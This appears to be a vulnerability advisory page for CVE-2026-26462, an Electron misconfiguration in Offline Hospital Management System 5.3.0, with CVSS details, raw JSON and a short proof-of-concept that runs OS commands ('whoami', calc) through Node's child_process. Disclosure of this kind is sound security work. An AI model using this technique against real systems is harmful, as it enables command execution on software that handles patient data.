Security Vulnerability Report
CVE-2026-26462 CVSS 7.3 HIGH

Published: 2026-05-18 15:16:25
Last Modified: 2026-05-20 13:16:17

Description

Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands.

CVSS Details

CVSS Score: 7.3
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Offline Hospital Management System 5.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Proof of Concept for CVE-2026-26462
// Exploiting Electron insecure configuration (Node.js integration enabled, context isolation disabled)
// This snippet demonstrates executing arbitrary OS commands from the renderer process.
const { exec } = require('child_process');

// Example: Execute 'whoami' to get the current user
exec('whoami', (error, stdout, stderr) => {
  if (error) {
    console.error(`exec error: ${error}`);
    return;
  }
  console.log(`Current User: ${stdout}`);
});

// Example: Execute 'calc' on Windows or 'open -a Calculator' on macOS
// exec('calc', (err) => { if(!err) console.log('Calculator opened'); });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26462", "sourceIdentifier": "[email protected]", "published": "2026-05-18T15:16:25.230", "lastModified": "2026-05-20T13:16:16.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-917"}]}], "references": [{"url": "https://medium.com/@husaainpalh/remote-code-execution-in-offline-hospital-management-system-cve-2026-26462-bc7ac54314c4", "source": "[email protected]"}, {"url": "https://sourceforge.net/projects/hospital-management-system/files/", "source": "[email protected]"}]}}